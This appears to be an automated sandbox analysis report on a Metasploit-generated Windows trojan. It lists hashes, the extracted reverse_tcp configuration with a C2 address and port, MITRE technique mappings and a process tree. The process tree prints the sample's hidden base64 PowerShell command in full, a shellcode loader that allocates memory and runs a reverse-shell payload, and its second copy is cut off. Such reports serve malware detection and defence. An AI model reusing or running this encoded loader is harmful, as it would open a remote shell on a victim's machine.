metasploit | 92b394fc2bb60837a2aab5ff5a01693b285d12bbe5fabdcbd9634262dfd67787

General

Target

92b394fc2bb60837a2aab5ff5a01693b285d12bbe5fabdcbd9634262dfd67787.exe
Size

17KB
MD5

01f7ce6d9dfd5705227235823d4f8fac
SHA1

2a6a8f97ccb27b743f033f52cbe44d940dec7cd6
SHA256

92b394fc2bb60837a2aab5ff5a01693b285d12bbe5fabdcbd9634262dfd67787
SHA512

27811ac4a97006fc63f8e34adc2e7159df9a9fe93ca4a3afcfd78e2e587d2d41c00167b05ad98c002d0493301c95f0eb9f47a6aaf931c008e6d981f647e44c96
SSDEEP

384:t7n9EEoLO56ayzcMj+g/uaIjdOPCcmL6nvDciFs5INe4pAHLw4gj:paE8O56lcVlOPCcfvDciFs5INerLwj

Score

10^/10

metasploit backdoor discovery execution trojan

Malware Config

Extracted

Family

metasploit

Version

encoder/shikata_ga_nai

Extracted

Family

metasploit

Version

windows/reverse_tcp

C2

192.168.42.130:4444

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Metasploit family
metasploit

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2712	powershell.exe

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2712	powershell.exe
2780	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2712	powershell.exe
Token: SeDebugPrivilege	2780	powershell.exe

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 2688 wrote to memory of 2944	2688	92b394fc2bb60837a2aab5ff5a01693b285d12bbe5fabdcbd9634262dfd67787.exe	31
PID 2688 wrote to memory of 2944	2688	92b394fc2bb60837a2aab5ff5a01693b285d12bbe5fabdcbd9634262dfd67787.exe	31
PID 2688 wrote to memory of 2944	2688	92b394fc2bb60837a2aab5ff5a01693b285d12bbe5fabdcbd9634262dfd67787.exe	31
PID 2944 wrote to memory of 2712	2944	cmd.exe	32
PID 2944 wrote to memory of 2712	2944	cmd.exe	32
PID 2944 wrote to memory of 2712	2944	cmd.exe	32
PID 2712 wrote to memory of 2780	2712	powershell.exe	33
PID 2712 wrote to memory of 2780	2712	powershell.exe	33
PID 2712 wrote to memory of 2780	2712	powershell.exe	33
PID 2712 wrote to memory of 2780	2712	powershell.exe	33
PID 2780 wrote to memory of 2604	2780	powershell.exe	34
PID 2780 wrote to memory of 2604	2780	powershell.exe	34
PID 2780 wrote to memory of 2604	2780	powershell.exe	34
PID 2780 wrote to memory of 2604	2780	powershell.exe	34
PID 2604 wrote to memory of 2568	2604	csc.exe	35
PID 2604 wrote to memory of 2568	2604	csc.exe	35
PID 2604 wrote to memory of 2568	2604	csc.exe	35
PID 2604 wrote to memory of 2568	2604	csc.exe	35

C:\Users\Admin\AppData\Local\Temp\92b394fc2bb60837a2aab5ff5a01693b285d12bbe5fabdcbd9634262dfd67787.exe
"C:\Users\Admin\AppData\Local\Temp\92b394fc2bb60837a2aab5ff5a01693b285d12bbe5fabdcbd9634262dfd67787.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2688
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -window hidden -EncodedCommand JABDAGkAagBGAHkAcAAgAD0AIAAnACQAWABaAEkAcQAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABYAFoASQBxACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGQAOQAsADAAeABjAGEALAAwAHgAZAA5ACwAMAB4ADcANAAsADAAeAAyADQALAAwAHgAZgA0ACwAMAB4ADUAOAAsADAAeAAzADMALAAwAHgAYwA5ACwAMAB4AGIAMQAsADAAeAA0AGIALAAwAHgAYgBiACwAMAB4ADUAZQAsADAAeAA1AGEALAAwAHgAYQA1ACwAMAB4ADEAOAAsADAAeAAzADEALAAwAHgANQA4ACwAMAB4ADEANwAsADAAeAA4ADMALAAwAHgAZQA4ACwAMAB4AGYAYwAsADAAeAAwADMALAAwAHgAMAA2ACwAMAB4ADQAOQAsADAAeAA0ADcALAAwAHgAZQBkACwAMAB4ADQAYQAsADAAeAA4ADUALAAwAHgAMAA4ACwAMAB4ADAAZQAsADAAeABiADIALAAwAHgANQA2ACwAMAB4ADcANwAsADAAeAA4ADYALAAwAHgANQA3ACwAMAB4ADYANwAsADAAeABhADUALAAwAHgAZgBjACwAMAB4ADEAYwAsADAAeABkAGEALAAwAHgANwA5ACwAMAB4ADcANgAsADAAeAA3ADAALAAwAHgAZAA3ACwAMAB4AGYAMgAsADAAeABkAGEALAAwAHgANgAwACwAMAB4AGQANgAsADAAeABmAGIALAAwAHgANQAwACwAMAB4AGYAYQAsADAAeAAzADAALAAwAHgAMABiACwAMAB4AGQAMAAsADAAeABiADAALAAwAHgANgA2ACwAMAB4ADIAMgAsADAAeABkAGUALAAwAHgAZQA4ACwAMAB4ADUAYgAsADAAeAAyADUALAAwAHgAYQAyACwAMAB4AGYAMgAsADAAeAA4AGYALAAwAHgAOAA1ACwAMAB4ADkAYgAsADAAeAAzAGQALAAwAHgAYwAyACwAMAB4AGMANAAsADAAeABkAGMALAAwAHgAOAA4ACwAMAB4AGEAOAAsADAAeAAyADkALAAwAHgAYgAwACwAMAB4ADUAZAAsADAAeABkADgALAAwAHgAZQA0ACwAMAB4ADIANQAsADAAeABlAGEALAAwAHgAOQBjACwAMAB4ADMANAAsADAAeAA0ADcALAAwAHgAMwBjACwAMAB4AGEAYgAsADAAeAAwADUALAAwAHgAMwBmACwAMAB4ADMAOQAsADAAeAA2AGMALAAwAHgAZgAxACwAMAB4AGYAMwAsADAAeAA0ADAALAAwAHgAYgBkACwAMAB4AGEAYQAsADAAeAA4ADAALAAwAHgAMQBhACwAMAB4ADEAZAAsADAAeAA0AGEALAAwAHgANAA0ACwAMAB4ADEAMQAsADAAeAAxADUALAAwAHgANQA0ACwAMAB4AGUAZgAsADAAeABlAGMALAAwAHgAZAAyACwAMAB4ADUAOAAsADAAeABhADYALAAwAHgANgA1ACwAMAB4ADIAZQAsADAAeAAyAGEALAAwAHgAMAA5ACwAMAB4ADgANgAsADAAeAA0AGUALAAwAHgAZgBhACwAMAB4ADUAYgAsADAAeABiADgALAAwAHgAOQAwACwAMAB4AGMAZAAsADAAeAA5ADEALAAwAHgAOQA0ACwAMAB4ADEAMgAsADAAeAAxADUALAAwAHgAOQAxACwAMAB4ADAANAAsADAAeAA2ADEALAAwAHgANgBkACwAMAB4AGUAMQAsADAAeABiADkALAAwAHgANwAyACwAMAB4AGIANgAsADAAeAA5AGIALAAwAHgANgA1ACwAMAB4AGYANgAsADAAeAAyADkALAAwAHgAMwBiACwAMAB4AGUAZQAsADAAeABhADAALAAwAHgAOABkACwAMAB4AGIAZAAsADAAeAAyADMALAAwAHgAMwA2ACwAMAB4ADQANQAsADAAeABiADEALAAwAHgAOAA4ACwAMAB4ADMAYwAsADAAeAAwADEALAAwAHgAZAA2ACwAMAB4ADAAZgAsADAAeAA5ADAALAAwAHgAMwA5ACwAMAB4AGUAMgAsADAAeAA4ADQALAAwAHgAMQA3ACwAMAB4AGUAZQAsADAAeAA2ADIALAAwAHgAZABlACwAMAB4ADMAMwAsADAAeAAyAGEALAAwAHgAMgBlACwAMAB4ADgANQAsADAAeAA1AGEALAAwAHgANgBiACwAMAB4ADgAYQAsADAAeAA2ADgALAAwAHgANgAyACwAMAB4ADYAYgAsADAAeAA3ADIALAAwAHgAZAA1ACwAMAB4AGMANgAsADAAeABlADcALAAwAHgAOQAxACwAMAB4ADAAMAAsADAAeAA3ADYALAAwAHgAMAA4ACwAMAB4ADYAYQAsADAAeAAyAGQALAAwAHgAMgBhACwAMAB4ADkAZgAsADAAeABhADYALAAwAHgAZQAzACwAMAB4AGQANQAsADAAeAA1AGYALAAwAHgAYQAxACwAMAB4ADcANAAsADAAeABhADUALAAwAHgANgBkACwAMAB4ADYAZQAsADAAeAAyAGUALAAwAHgAMgAxACwAMAB4AGQAZQAsADAAeABlADcALAAwAHgAZQA4ACwAMAB4AGIANgAsADAAeAA1ADcALAAwAHgAZQBmACwAMAB4ADAAYgAsADAAeAA2ADgALAAwAHgAZABmACwAMAB4ADYAMAAsADAAeABmADIALAAwAHgAOAA5ACwAMAB4ADIAMAAsADAAeABhADgALAAwAHgAMwAwACwAMAB4AGQAZAAsADAAeAA3ADAALAAwAHgAYwAyACwAMAB4ADkAMQAsADAAeAA1AGUALAAwAHgAMQBiACwAMAB4ADEAMgAsADAAeAAxAGUALAAwAHgAOABiACwAMAB4AGIANgAsADAAeAAxADgALAAwAHgAOAA4ACwAMAB4AGYANAAsADAAeABlAGYALAAwAHgAMwA3ACwAMAB4AGMAYQAsADAAeAA5AGQALAAwAHgAZQBkACwAMAB4ADQANwAsADAAeABkAGIALAAwAHgAMAAxACwAMAB4ADcAYgAsADAAeABhADEALAAwAHgAOABiACwAMAB4AGUAOQAsADAAeAAyAGIALAAwAHgANwBlACwAMAB4ADYAYgAsADAAeAA1AGEALAAwAHgAOABjACwAMAB4ADIAZQAsADAAeAAwADMALAAwAHgAYgAwACwAMAB4ADAAMwAsADAAeAAxADAALAAwAHgAMwAzACwAMAB4AGIAYgAsADAAeABjADkALAAwAHgAMwA5ACwAMAB4AGQAOQAsADAAeAA1ADQALAAwAHgAYQA0ACwAMAB4ADEAMgAsADAAeAA3ADUALAAwAHgAYwBjACwAMAB4AGUAZAAsADAAeABlADkALAAwAHgAZQA0ACwAMAB4ADEAMQAsADAAeAAzADgALAAwAHgAOQA0ACwAMAB4ADIANgAsADAAeAA5ADkALAAwAHgAYwBmACwAMAB4ADYAOAAsADAAeABlADgALAAwAHgANgBhACwAMAB4AGEANQAsADAAeAA3AGEALAAwAHgAOQBjACwAMAB4ADkAYQAsADAAeABmADAALAAwAHgAMgAxACwAMAB4ADAAYQAsADAAeABhADQALAAwAHgAMgBlACwAMAB4ADQAZgAsADAAeABiADIALAAwAHgAMwAwACwAMAB4AGQANQAsADAAeABjADYALAAwAHgAZQA1ACwAMAB4AGEAYwAsADAAeABkADcALAAwAHgAMwBmACwAMAB4AGMAMQAsADAAeAA3ADIALAAwAHgAMgA3ACwAMAB4ADYAYQAsADAAeAA1AGEALAAwAHgAYgBhACwAMAB4AGIAZAAsADAAeABkADUALAAwAHgAMwA0ACwAMAB4AGMAMwAsADAAeAA1ADEALAAwAHgAZAA2ACwAMAB4AGMANAAsADAAeAA5ADUALAAwAHgAMwBiACwAMAB4AGQANgAsADAAeABhAGMALAAwAHgANAAxACwAMAB4ADEAOAAsADAAeAA4ADUALAAwAHgAYwA5ACwAMAB4ADgAZAAsADAAeABiADUALAAwAHgAYgA5ACwAMAB4ADQAMgAsADAAeAAxADgALAAwAHgAMwA2ACwAMAB4AGUAOAAsADAAeAAzADcALAAwAHgAOABiACwAMAB4ADUAZQAsADAAeAAxADYALAAwAHgANgBlACwAMAB4AGYAYgAsADAAeABjADAALAAwAHgAZQA5ACwAMAB4ADQANQAsADAAeABmAGQALAAwAHgAMwBkACwAMAB4ADMAYwAsADAAeABhADMALAAwAHgAOABiACwAMAB4ADIAZgAsADAAeABmAGMAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAEMAaQBqAEYAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAEMAaQBqAEYALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAEMAaQBqAEYALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJABDAGkAagBGAHkAcAApACkAOwAkAFUASQBOAFMAIAA9ACAAIgAtAGUAbgBjACAAIgA7AGkAZgAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQBxACAAOAApAHsAJABRAFoANgAgAD0AIAAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAAgACsAIAAiAFwAcwB5AHMAdwBvAHcANgA0AFwAVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAFwAdgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7AGkAZQB4ACAAIgAmACAAJABRAFoANgAgACQAVQBJAE4AUwAgACQAZQAiAH0AZQBsAHMAZQB7ADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJABVAEkATgBTACAAJABlACIAOwB9AA==
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2944
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -window hidden -EncodedCommand JABDAGkAagBGAHkAcAAgAD0AIAAnACQAWABaAEkAcQAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABYAFoASQBxACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGQAOQAsADAAeABjAGEALAAwAHgAZAA5ACwAMAB4ADcANAAsADAAeAAyADQALAAwAHgAZgA0ACwAMAB4ADUAOAAsADAAeAAzADMALAAwAHgAYwA5ACwAMAB4AGIAMQAsADAAeAA0AGIALAAwAHgAYgBiACwAMAB4ADUAZQAsADAAeAA1AGEALAAwAHgAYQA1ACwAMAB4ADEAOAAsADAAeAAzADEALAAwAHgANQA4ACwAMAB4ADEANwAsADAAeAA4ADMALAAwAHgAZQA4ACwAMAB4AGYAYwAsADAAeAAwADMALAAwAHgAMAA2ACwAMAB4ADQAOQAsADAAeAA0ADcALAAwAHgAZQBkACwAMAB4ADQAYQAsADAAeAA4ADUALAAwAHgAMAA4ACwAMAB4ADAAZQAsADAAeABiADIALAAwAHgANQA2ACwAMAB4ADcANwAsADAAeAA4ADYALAAwAHgANQA3ACwAMAB4ADYANwAsADAAeABhADUALAAwAHgAZgBjACwAMAB4ADEAYwAsADAAeABkAGEALAAwAHgANwA5ACwAMAB4ADcANgAsADAAeAA3ADAALAAwAHgAZAA3ACwAMAB4AGYAMgAsADAAeABkAGEALAAwAHgANgAwACwAMAB4AGQANgAsADAAeABmAGIALAAwAHgANQAwACwAMAB4AGYAYQAsADAAeAAzADAALAAwAHgAMABiACwAMAB4AGQAMAAsADAAeABiADAALAAwAHgANgA2ACwAMAB4ADIAMgAsADAAeABkAGUALAAwAHgAZQA4ACwAMAB4ADUAYgAsADAAeAAyADUALAAwAHgAYQAyACwAMAB4AGYAMgAsADAAeAA4AGYALAAwAHgAOAA1ACwAMAB4ADkAYgAsADAAeAAzAGQALAAwAHgAYwAyACwAMAB4AGMANAAsADAAeABkAGMALAAwAHgAOAA4ACwAMAB4AGEAOAAsADAAeAAyADkALAAwAHgAYgAwACwAMAB4ADUAZAAsADAAeABkADgALAAwAHgAZQA0ACwAMAB4ADIANQAsADAAeABlAGEALAAwAHgAOQBjACwAMAB4ADMANAAsADAAeAA0ADcALAAwAHgAMwBjACwAMAB4AGEAYgAsADAAeAAwADUALAAwAHgAMwBmACwAMAB4ADMAOQAsADAAeAA2AGMALAAwAHgAZgAxACwAMAB4AGYAMwAsADAAeAA0ADAALAAwAHgAYgBkACwAMAB4AGEAYQAsADAAeAA4ADAALAAwAHgAMQBhACwAMAB4ADEAZAAsADAAeAA0AGEALAAwAHgANAA0ACwAMAB4ADEAMQAsADAAeAAxADUALAAwAHgANQA0ACwAMAB4AGUAZgAsADAAeABlAGMALAAwAHgAZAAyACwAMAB4ADUAOAAsADAAeABhADYALAAwAHgANgA1ACwAMAB4ADIAZQAsADAAeAAyAGEALAAwAHgAMAA5ACwAMAB4ADgANgAsADAAeAA0AGUALAAwAHgAZgBhACwAMAB4ADUAYgAsADAAeABiADgALAAwAHgAOQAwACwAMAB4AGMAZAAsADAAeAA5ADEALAAwAHgAOQA0ACwAMAB4ADEAMgAsADAAeAAxADUALAAwAHgAOQAxACwAMAB4ADAANAAsADAAeAA2ADEALAAwAHgANgBkACwAMAB4AGUAMQAsADAAeABiADkALAAwAHgANwAyACwAMAB4AGIANgAsADAAeAA5AGIALAAwAHgANgA1ACwAMAB4AGYANgAsADAAeAAyADkALAAwAHgAMwBiACwAMAB4AGUAZQAsADAAeABhADAALAAwAHgAOABkACwAMAB4AGIAZAAsADAAeAAyADMALAAwAHgAMwA2ACwAMAB4ADQANQAsADAAeABiADEALAAwAHgAOAA4ACwAMAB4ADMAYwAsADAAeAAwADEALAAwAHgAZAA2ACwAMAB4ADAAZgAsADAAeAA5ADAALAAwAHgAMwA5ACwAMAB4AGUAMgAsADAAeAA4ADQALAAwAHgAMQA3ACwAMAB4AGUAZQAsADAAeAA2ADIALAAwAHgAZABlACwAMAB4ADMAMwAsADAAeAAyAGEALAAwAHgAMgBlACwAMAB4ADgANQAsADAAeAA1AGEALAAwAHgANgBiACwAMAB4ADgAYQAsADAAeAA2ADgALAAwAHgANgAyACwAMAB4ADYAYgAsADAAeAA3ADIALAAwAHgAZAA1ACwAMAB4AGMANgAsADAAeABlADcALAAwAHgAOQAxACwAMAB4ADAAMAAsADAAeAA3ADYALAAwAHgAMAA4ACwAMAB4ADYAYQAsADAAeAAyAGQALAAwAHgAMgBhACwAMAB4ADkAZgAsADAAeABhADYALAAwAHgAZQAzACwAMAB4AGQANQAsADAAeAA1AGYALAAwAHgAYQAxACwAMAB4ADcANAAsADAAeABhADUALAAwAHgANgBkACwAMAB4ADYAZQAsADAAeAAyAGUALAAwAHgAMgAxACwAMAB4AGQAZQAsADAAeABlADcALAAwAHgAZQA4ACwAMAB4AGIANgAsADAAeAA1ADcALAAwAHgAZQBmACwAMAB4ADAAYgAsADAAeAA2ADgALAAwAHgAZABmACwAMAB4ADYAMAAsADAAeABmADIALAAwAHgAOAA5ACwAMAB4ADIAMAAsADAAeABhADgALAAwAHgAMwAwACwAMAB4AGQAZAAsADAAeAA3ADAALAAwAHgAYwAyACwAMAB4ADkAMQAsADAAeAA1AGUALAAwAHgAMQBiACwAMAB4ADEAMgAsADAAeAAxAGUALAAwAHgAOABiACwAMAB4AGIANgAsADAAeAAxADgALAAwAHgAOAA4ACwAMAB4AGYANAAsADAAeABlAGYALAAwAHgAMwA3ACwAMAB4AGMAYQAsADAAeAA5AGQALAAwAHgAZQBkACwAMAB4ADQANwAsADAAeABkAGIALAAwAHgAMAAxACwAMAB4ADcAYgAsADAAeABhADEALAAwAHgAOABiACwAMAB4AGUAOQAsADAAeAAyAGIALAAwAHgANwBlACwAMAB4ADYAYgAsADAAeAA1AGEALAAwAHgAOABjACwAMAB4ADIAZQAsADAAeAAwADMALAAwAHgAYgAwACwAMAB4ADAAMwAsADAAeAAxADAALAAwAHgAMwAzACwAMAB4AGIAYgAsADAAeABjADkALAAwAHgAMwA5ACwAMAB4AGQAOQAsADAAeAA1ADQALAAwAHgAYQA0ACwAMAB4ADEAMgAsADAAeAA3ADUALAAwAHgAYwBjACwAMAB4AGUAZAAsADAAeABlADkALAAwAHgAZQA0ACwAMAB4ADEAMQAsADAAeAAzADgALAAwAHgAOQA0ACwAMAB4ADIANgAsADAAeAA5ADkALAAwAHgAYwBmACwAMAB4ADYAOAAsADAAeABlADgALAAwAHgANgBhACwAMAB4AGEANQAsADAAeAA3AGEALAAwAHgAOQBjACwAMAB4ADkAYQAsADAAeABmADAALAAwAHgAMgAxACwAMAB4ADAAYQAsADAAeABhADQALAAwAHgAMgBlACwAMAB4ADQAZgAsADAAeABiADIALAAwAHgAMwAwACwAMAB4AGQANQAsADAAeABjADYALAAwAHgAZQA1ACwAMAB4AGEAYwAsADAAeABkADcALAAwAHgAMwBmACwAMAB4AGMAMQAsADAAeAA3ADIALAAwAHgAMgA3ACwAMAB4ADYAYQAsADAAeAA1AGEALAAwAHgAYgBhACwAMAB4AGIAZAAsADAAeABkADUALAAwAHgAMwA0ACwAMAB4AGMAMwAsADAAeAA1ADEALAAwAHgAZAA2ACwAMAB4AGMANAAsADAAeAA5ADUALAAwAHgAMwBiACwAMAB4AGQANgAsADAAeABhAGMALAAwAHgANAAxACwAMAB4ADEAOAAsADAAeAA4ADUALAAwAHgAYwA5ACwAMAB4ADgAZAAsADAAeABiADUALAAwAHgAYgA5ACwAMAB4ADQAMgAsADAAeAAxADgALAAwAHgAMwA2ACwAMAB4AGUAOAAsADAAeAAzADcALAAwAHgAOABiACwAMAB4ADUAZQAsADAAeAAxADYALAAwAHgANgBlACwAMAB4AGYAYgAsADAAeABjADAALAAwAHgAZQA5ACwAMAB4ADQANQAsADAAeABmAGQALAAwAHgAMwBkACwAMAB4ADMAYwAsADAAeABhADMALAAwAHgAOABiACwAMAB4ADIAZgAsADAAeABmAGMAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAEMAaQBqAEYAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAEMAaQBqAEYALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAEMAaQBqAEYALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJABDAGkAagBGAHkAcAApACkAOwAkAFUASQBOAFMAIAA9ACAAIgAtAGUAbgBjACAAIgA7AGkAZgAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQBxACAAOAApAHsAJABRAFoANgAgAD0AIAAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAAgACsAIAAiAFwAcwB5AHMAdwBvAHcANgA0AFwAVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAFwAdgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7AGkAZQB4ACAAIgAmACAAJABRAFoANgAgACQAVQBJAE4AUwAgACQ